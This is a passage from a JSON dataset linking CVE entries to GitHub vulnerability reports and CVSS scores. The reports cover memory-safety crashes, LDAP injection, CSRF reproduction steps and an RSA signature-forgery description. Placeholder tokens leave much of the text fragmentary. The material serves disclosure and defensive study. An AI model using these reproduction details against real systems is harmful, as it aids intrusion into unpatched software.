        "Issue_Created_At": "2021-02-28T15:14:45Z",
        "description": "CVETAG clarification needed. CVETAG URLTAG vulnerability description is: CODETAG Am I correct that this is not a vulnerability and needs admin privileges (or special permissions for regular users) and that the software is intended to behave in this manner?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-36120",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/143",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/143",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2020-12-30T04:12:13Z",
        "description": "stack buffer overflow in sixel_encoder_encode_bytes at APITAG Version Libsixel NUMBERTAG Ubuntu NUMBERTAG LTS I fuzzed the sixelapi ERRORTAG Please use the following method to compile the attached cc file and run APITAG FILETAG Because uploading the zip failed,I switched to a txt file,please download the attachment and modify the suffix to cc ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36123",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/144",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/144",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2020-12-31T01:11:15Z",
        "description": "APITAG double free in in sixel_chunk_destroy PATHTAG img2sixel NUMBERTAG configured with: libcurl: no libpng: yes libjpeg: no gdk pixbuf2: no GD: no compiled with : APITAG run APITAG FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36144",
        "Issue_Url_old": "https://github.com/getredash/redash/issues/5426",
        "Issue_Url_new": "https://github.com/getredash/redash/issues/5426",
        "Repo_new": "getredash/redash",
        "Issue_Created_At": "2021-03-14T02:16:09Z",
        "description": "LDAP Injection . I've tried to contact the security team through APITAG but had no response. I'm attaching the CVE contents for a proper fix. Suggested description > Redash is affected by LDAP Injection. There is an authentication > bypass and information leak through the crafting of special queries, > escaping the provided template because the ldap_user = > APITAG APITAG > auth_ldap_user(username, password) APITAG % > {\"username\": username} code lacks sanitization. Additional Information > I sent an email to the organization through security APITAG (specified in URLTAG NUMBERTAG days ago and haven't got a reply yet. > Repo link: URLTAG APITAG Other > CVETAG : LDAP Injection Affected Component > PATHTAG > > (line NUMBERTAG ldap_user = APITAG APITAG > (line NUMBERTAG def auth_ldap_user(username, password) > (line NUMBERTAG APITAG % {\"username\": username}, Attack Type > Remote Impact Escalation of Privileges > true Impact Information Disclosure > true Attack Vectors > To exploit this vulnerability, the LDAP Authentication must be enabled, and an attacker has to craft a query escaping the template. > > Entry Point: ldap_user = APITAG APITAG (line NUMBERTAG Since there is no sanitization when it arrives to the actual search function from LDAP (line NUMBERTAG an special crafted query can bypass the authentication and exfiltrate information. Reference > URLTAG > URLTAG > URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36148",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/138",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/138",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-08-26T16:00:48Z",
        "description": "NULL pointer dereference in APITAG . Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bf6b NUMBERTAG e bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG T NUMBERTAG f NUMBERTAG bf6b NUMBERTAG d ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36149",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/137",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/137",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-08-26T15:56:07Z",
        "description": "NULL pointer dereference in APITAG Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec7bf NUMBERTAG e bp NUMBERTAG ffee7ed NUMBERTAG sp NUMBERTAG ffee7ed NUMBERTAG T NUMBERTAG fec7bf NUMBERTAG d ( PATHTAG NUMBERTAG d6 in APITAG PATHTAG NUMBERTAG dc9 in APITAG PATHTAG NUMBERTAG dc9 in mysofa_tocartesian PATHTAG NUMBERTAG ea7 in mysofa_open_default PATHTAG NUMBERTAG ea7 in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG fec7b5ed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36150",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/135",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/135",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-08-26T13:10:12Z",
        "description": "Heap buffer overflow in loudness. Opening maliciously crafted file with mysofa_open leads to crash of the application. Heap buffer overread by NUMBERTAG bytes in APITAG ( PATHTAG ) cause segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault NUMBERTAG fcdc in loudness (in NUMBERTAG size NUMBERTAG at PATHTAG NUMBERTAG res += in in; > APITAG report on crash: > ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ea6 sp NUMBERTAG fffe NUMBERTAG a NUMBERTAG f8 T NUMBERTAG e in loudness PATHTAG NUMBERTAG b6a2 in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36151",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/134",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/134",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-08-25T18:42:17Z",
        "description": "Heap buffer overflow in mysofa_resampler_reset_mem. Opening malicious file with mysofa_open leads to crash of the application. Heap buffer overflow is caused by zeroing memory block of size NUMBERTAG casted to unsigned) in mysofa_resampler_reset_mem APITAG APITAG report on crash NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fbfc at pc NUMBERTAG f9a NUMBERTAG bec bp NUMBERTAG fffc1d NUMBERTAG sp NUMBERTAG fffc1d NUMBERTAG ae8 WRITE of size NUMBERTAG at NUMBERTAG fbfc thread T NUMBERTAG f9a NUMBERTAG beb in __asan_memset ( PATHTAG NUMBERTAG d in mysofa_resampler_reset_mem PATHTAG NUMBERTAG bfc4 in mysofa_resample PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open PATHTAG NUMBERTAG c0a in main APITAG NUMBERTAG f9a NUMBERTAG f3e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy);",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36152",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/136",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/136",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-08-26T15:33:36Z",
        "description": "Stack buffer overflow in APITAG Incorrect use of sprintf on a too small buffer leads to a stack buffer overflow by NUMBERTAG bytes in APITAG This can lead to overwriting the next variable on the stack and logic errors in the application or crash in case of strong stack protection. GDB stacktrace NUMBERTAG ce in sprintf (__fmt NUMBERTAG APITAG __s NUMBERTAG fffffffcab0 \"REF NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG c4b in APITAG (reader NUMBERTAG fffffffd NUMBERTAG da NUMBERTAG fffffffcb NUMBERTAG dt NUMBERTAG fffffffcb NUMBERTAG ds NUMBERTAG fffffffcbb0, dim=dim APITAG at PATHTAG NUMBERTAG dc4 in APITAG APITAG da=da APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG aa7 in APITAG APITAG dataobject NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e5 in APITAG (end NUMBERTAG dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG (dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG end_of_messages NUMBERTAG at PATHTAG NUMBERTAG e7 in APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG dataobject NUMBERTAG fffffffd NUMBERTAG dataobject NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c9 in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ef in APITAG APITAG APITAG name=name APITAG at PATHTAG NUMBERTAG ebde in APITAG APITAG APITAG at PATHTAG NUMBERTAG f6ab in APITAG APITAG APITAG at PATHTAG NUMBERTAG bb6c in mysofa_load APITAG APITAG err=err APITAG at PATHTAG NUMBERTAG d NUMBERTAG in mysofa_open_default APITAG neighbor_angle_step NUMBERTAG APITAG err NUMBERTAG fffffffd NUMBERTAG filterlength NUMBERTAG fffffffd NUMBERTAG samplerate=<optimized out>, filename NUMBERTAG fffffffdb NUMBERTAG APITAG at PATHTAG NUMBERTAG mysofa_open (filename NUMBERTAG fffffffdb NUMBERTAG APITAG APITAG APITAG err=err APITAG at PATHTAG NUMBERTAG d5 in main (argc NUMBERTAG arg NUMBERTAG fffffffd NUMBERTAG at APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Solution: Make the number buffer larger, use snprintf with the size of the number buffer and check the value returned by snprintf!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36179",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3004",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3004",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2021-01-01T01:03:14Z",
        "description": "Block one more DBCP related potential gadget class. (note: placeholder until verified) One gadget type related to Apache DBCP NUMBERTAG was reported as possible gadget type and should be blocked (it may or may not allow vuln on its own). See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: [not yet allocated] Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36183",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3003",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3003",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2021-01-01T00:43:41Z",
        "description": "Block one more gadget type (xxx, CVE to be allocated). Another gadget type(s) reported regarding class(es) of [to be added] library. See URLTAG for description of the general problem. Reporter(s): (to be added) Mitre id: [not yet allocated] Note: derivative of NUMBERTAG embedded Xalan) Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36191",
        "Issue_Url_old": "https://github.com/jupyterhub/jupyterhub/issues/3304",
        "Issue_Url_new": "https://github.com/jupyterhub/jupyterhub/issues/3304",
        "Repo_new": "jupyterhub/jupyterhub",
        "Issue_Created_At": "2020-12-11T02:02:14Z",
        "description": "Anti CSRF token is not working in Admin panel. Bug description In APITAG Admin panel, the _xsrf token is not working for add/delete user features. Current mechanism to protect add/delete user features against CSRF attack is solely rely on checking the Referer header value. Although current referer header examination seems to be strict enough, it could still be bypassed if user is fooled to install malicious browser plugin or there exists any escape techniques. Expected behaviour Implement anti CSRF techniques like Double Submit Cookie, so that APITAG could prevent CSRF attack. Actual behaviour Even if the _xsrf token is removed the add/delete user requests could still be accepted & processed by server. That could lead to a possible CSRF attack. Screen Capture of successfully adding user without _xsrf token FILETAG Screen Capture of successfully deleting user without _xsrf token FILETAG How to reproduce NUMBERTAG Log in APITAG console with admin privilege NUMBERTAG Click Control Panel button NUMBERTAG Click Admin tab NUMBERTAG Click Add User button / Delete User button NUMBERTAG Use proxy technique to intercept the packet sent NUMBERTAG Modify the packet by removing the _xsrf token NUMBERTAG Send the request & see the request is accepted Your personal set up OS: Kubernetes NUMBERTAG Helm charts NUMBERTAG ubi NUMBERTAG ersion(s): APITAG NUMBERTAG Python NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.5,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-36192",
        "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/344",
        "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/344",
        "Repo_new": "mantisbt-plugins/source-integration",
        "Issue_Created_At": "2020-10-12T07:43:38Z",
        "description": "Attacker can disclose the status of private issue . Description This issue allows the attacker to disclose the current status of a private report by attaching it on the attach issues field. Assume you successfully install the Source Integration, as attacker go to Repositories Go to changesets Look for the Attach Issues field Assume you know the id of the private issue insert it Request CODETAG Response ERRORTAG By default the issue is not crossed out (if the issue is recently send/not modified) Click the details button It will redirect to APITAG where the attach issue will also include. In this case my issue get resolved so the color indicator is green If we click the issue it will just return Access Denied. At first I get confuse if this is a default feature or not but I guess if this is not an issue please validate the type of issue (check if public/private issue)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36193",
        "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/35",
        "Issue_Url_new": "https://github.com/pear/archive_tar/issues/35",
        "Repo_new": "pear/archive_tar",
        "Issue_Created_At": "2021-02-02T17:56:36Z",
        "description": "relative symlinks APITAG of path file extraction) with new commit cde NUMBERTAG ff NUMBERTAG ERRORTAG b5b3ccb NUMBERTAG e9b NUMBERTAG de NUMBERTAG Hi, I've been trying to install twofactor_webauthn in APITAG but kept getting an error APITAG not extract app twofactor_webauthn\". APITAG doesn't seem to report the msg from the _error function in APITAG I'm not looking in the right place?), but I modified the _error function to log it to file and caught this problem: Out of path file extraction PATHTAG > PATHTAG That symlink is not out of path, so I'm not sure why it's failing. Here is a link to the tarball to investigate if desired: FILETAG And here is a link to the bug report on the APITAG app: URLTAG Thanks! Rick",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36242",
        "Issue_Url_old": "https://github.com/pyca/cryptography/issues/5615",
        "Issue_Url_new": "https://github.com/pyca/cryptography/issues/5615",
        "Repo_new": "pyca/cryptography",
        "Issue_Created_At": "2020-12-09T15:02:20Z",
        "description": "Fernet fails to encrypt/decrypt large data. Hello, Thank you for this fine library. I've been having some issues when encrypting large data APITAG using the Fernet class. There seems to be several failure modes, I've seen everything from a segfault, SIGABRT to the decrypted plaintext differing from the original plaintext. Please note that I've had some issues with the RAM on my computer (so that could potentially be the source of _some_ of the failures), but I've verified at least the SIGABRT failures on three different computers. It seems to me that the issue seems to be an integer overflow in APITAG but I'm not sure if Cryptography is at fault for passing an integer that is too large, or APITAG is at fault for not checking the integer, or a combination. If you think this should be fixed in APITAG please let me know how to best report the issue to them. Please see the attached script for more detailed information, as I think it speaks for itself NUMBERTAG Software versions: Python NUMBERTAG APITAG NUMBERTAG h cryptography NUMBERTAG cffi NUMBERTAG pip NUMBERTAG setuptools NUMBERTAG Installed cryptography through pip To reproduce: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36244",
        "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/265",
        "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/265",
        "Repo_new": "covesa/dlt-daemon",
        "Issue_Created_At": "2020-11-02T18:38:23Z",
        "description": "write heap buffer overflow in dlt_buffer_write_block. Hello, I have fuzzed dlt daemon to search for bugs using the Tool CI Fuzz. I think I found a write heap buffer overflow in the function dlt_buffer_write_block. You can find the full crash report below. This is from a fuzz test I wrote to execute the function dlt_buffer_push with fuzzer generated inputs. After having a look at the code it seems that there is no size check before writing to the ring buffer: There is no check if size APITAG size in dlt_buffer_write_block. As far as I can say this condition isn't checked elsewhere. Since buffer overflows can often be used to get arbitrary code execution this is a potential security issue. Using the dlt_daemon_client_send function a connected dlt user could write into the memory of the daemon and possibly gain arbitrary code execution. I think this could be fixed by changing the if condition in APITAG (in function dlt_buffer_push3) into a while loop. If you need further information or discussion I'm happy to help as far as I can NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG bp NUMBERTAG ffca5a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffca5a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f in __asan_memcpy PATHTAG NUMBERTAG fe NUMBERTAG a1c NUMBERTAG b in dlt_buffer_write_block PATHTAG NUMBERTAG fe NUMBERTAG a1cf7b9 in dlt_buffer_push3 PATHTAG NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG de5d in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in malloc PATHTAG NUMBERTAG fe NUMBERTAG a1c5f2e in dlt_buffer_increase_size PATHTAG NUMBERTAG fe NUMBERTAG a1cec2f in dlt_buffer_push3 PATHTAG NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c4c NUMBERTAG b NUMBERTAG c4c NUMBERTAG c NUMBERTAG c4c NUMBERTAG d NUMBERTAG c4c NUMBERTAG e NUMBERTAG c4c NUMBERTAG f NUMBERTAG c4c NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING MS NUMBERTAG base unit: APITAG artifact_prefix='./'; Test unit written to ./crash APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36245",
        "Issue_Url_old": "https://github.com/GramAddict/bot/issues/134",
        "Issue_Url_new": "https://github.com/gramaddict/bot/issues/134",
        "Repo_new": "gramaddict/bot",
        "Issue_Created_At": "2020-12-08T10:55:40Z",
        "description": "Running APITAG lets anyone on the network control/view your device!. When using uiautomator2 URLTAG , which is what APITAG is based around, it silently installs the application ATX Agent URLTAG on your device, which opens a webserver on TCP port NUMBERTAG that lets anyone on the network, with ZERO form of authentication, execute code, install apps, download private data etc. on your device and view the screen remotely. As soon as you're running APITAG this webserver is started. This is a HUGE security concern , and should be addressed immediately! Try it yourself NUMBERTAG Find the Wi Fi IP address of your device: APITAG (NOTE: It is trivial for anyone on the same network to discover your device and the running webserver NUMBERTAG Run APITAG as ususal NUMBERTAG Using another device on the same network, go to APITAG in your browser. This is what you're presented with: APITAG APITAG _(censored for my privacy)_ APITAG APITAG showing the API page, as it exposes too much personal info. You can view its endpoints and capabilities at the ATX Agent page linked above) This is extremely worrying!",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36282",
        "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
        "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
        "Repo_new": "rabbitmq/rabbitmq-jms-client",
        "Issue_Created_At": "2020-11-02T10:38:12Z",
        "description": "Limit APITAG deserialization. APITAG should use the same \"white list\" mechanism as APITAG to avoid some arbitrary code execution on deserialization. Even though APITAG is supposed to handle only primitive types, it is still to possible to send a message that contains an arbitrary serializable instance. The consuming application application may then execute code from this class on deserialization. The fix consists in using the list of trusted packages that can be set at the connection factory level.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36315",
        "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/154",
        "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/154",
        "Repo_new": "relic-toolkit/relic",
        "Issue_Created_At": "2020-06-29T14:10:21Z",
        "description": "PKCS NUMBERTAG implementation and Bleichenbacher style small exponent signature forgery. Hi there, As I was testing the PKCS NUMBERTAG implementation inside RELIC, it appears to me that it might be susceptible to a Bleichenbacher style small exponent signature forgery. In a nut shell, there are mainly NUMBERTAG issues in the code (both in APITAG ) that enables the attack NUMBERTAG The checks on the first NUMBERTAG bytes to see whether they are indeed APITAG actually doesn't lead to rejection of malformed inputs. Although line NUMBERTAG URLTAG and line NUMBERTAG URLTAG will set APITAG if the prefix bytes do not match the expectation, the result variable is never checked later and will get overwritten on line NUMBERTAG URLTAG , hence the first NUMBERTAG bytes can take any arbitrary values and the signature verification will still go through NUMBERTAG More importantly, the APITAG loop on line NUMBERTAG URLTAG only checks that the padding has not been terminated with a zero, but it doesn't actually require the each of the padding bytes to be APITAG , and because of this, the padding can take arbitrary non zero values and the signature verification will still go through. Together, this opens up the possibility of a Bleichenbacher style small exponent signature forgery. Here is a proof of concept forgery attack, based on the APITAG given in the source tree: ERRORTAG For convenience I used a somewhat unconventional sized NUMBERTAG bit long) modulus. I used APITAG to generate it, but you can try it with a different NUMBERTAG bit long modulus and the forged signature should still work. The forgery algorithm should also work against \"regular\" sized (e.g NUMBERTAG bit and NUMBERTAG bit long) moduli, though I have yet to have a chance to work on that, and I think the above proof of concept already serves the purpose. Such a forgery should only work when e is small enough (which in most cases means APITAG ), and although RELIC by default doesn't generate RSA keys with APITAG , there is a possibility that someone might use APITAG for specific application & interoperability needs, and nothing in the API is prohibiting the programming from doing it. In any case, unless the plan is to completely drop the support of PKCS NUMBERTAG I'd suggest to have the issues in APITAG fixed, as it is definitely possible (and not really that difficult) to make the signature verification much more robust. More details on the Bleichenbacher style signature forgery can be found in academic papers like FILETAG and FILETAG . Finally, though it shouldn't matter much, this is the script I used ( APITAG ) to configure the build: CODETAG",
